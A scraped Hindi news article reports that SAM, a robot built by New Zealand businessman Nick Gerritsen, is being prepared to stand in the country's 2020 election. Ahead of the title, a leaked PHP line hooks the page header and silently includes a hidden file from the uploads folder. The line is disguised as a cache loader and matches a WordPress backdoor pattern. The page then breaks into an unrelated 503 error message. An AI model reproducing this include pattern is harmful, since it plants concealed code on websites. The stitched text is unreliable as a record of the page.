add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); रोबोट बनेगा आपका नेता, 2020 में लड़ेगा चुनाव – SOCH INDIA
Menu

दुनिया
रोबोट बनेगा आपका नेता, 2020 में लड़ेगा चुनाव

nobanner

रोबोटिक्स की दुनिया में नित नए करिश्मे हो रहे हैं. आर्टिफीशियल इंटेलीजेंस यानि मशीनी दिमाग वाली फिल्में तो आपने बहुतेरी देखी होंगी लेकिन मानव इतिहास में पहली बार ये चमत्कार होने जा रहा है. एक रोबोट चुनाव लड़ने जा रहा है. हो गए ना हैरान! लेकिन बात सौ फीसदी सही है.

अब तक आपने सुना होगा कि रोबोट बहुत कुछ कर सकता है. मगर क्या आप ये कल्पना कर सकते हैं कि एक रोबोट चुनाव लड़ कर आपका प्रतिनिधित्व करेगा? वैज्ञानिकों ने दुनिया का पहला ऐसा रोबोट तैयार किया है जो समाज की मूलभूत सुविधाओं जैसे शिक्षा, स्वास्थ और आजीविका संबंधी नीतियां से जुड़ी समस्याओँ का जवाब देगा.

साथ ही साथ ये रोबोट चुनाव में उम्मीदवार के रुप में चुनाव भी लड़ सकेगा. दरअसल, न्यूजीलैंड के बिजनेसमैन निक गेरिट्सन ने यह अविष्कार किया है. इस रोबोट को न्यूजीलैंड के आम चुनाव 2020 में उम्मीदवार के रुप में चुनाव मैदान में उतारने की कोशिशें भी तेजी से चल रही हैं. इस रोबोट को ‘सैम’ (एसएएम) नाम दिया गया है.

गेरिट्सन ने मीडिया को बताया, ‘ऐसा लगता है कि फिलहाल राजनीति में कई पूर्वाग्रह हैं, प्रतीत होता है कि दुनिया के देश जलवायु परिवर्तन एवं समानता जैसे जटिल मुद्दों का हल नहीं निकाल पा रहे हैं.” सउन्होंने कहा कि यह रोबोट लगातार फेसबुक मेसेन्जर के जरिए लोगों को प्रतिक्रिया देना सीख रहा है.

बता दें, न्यूजीलैंड में साल 2020 के आखिर में आम चुनाव होना है इसे देखते हुए रोबोट का अविष्कार करने वाले बिजनेसमैन गेरिट्सन को लगता है कि उस समय तक सैम एक प्रत्याशी के रुप में चुनाव लड़ने के लिए तैयार हो जाएगा.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.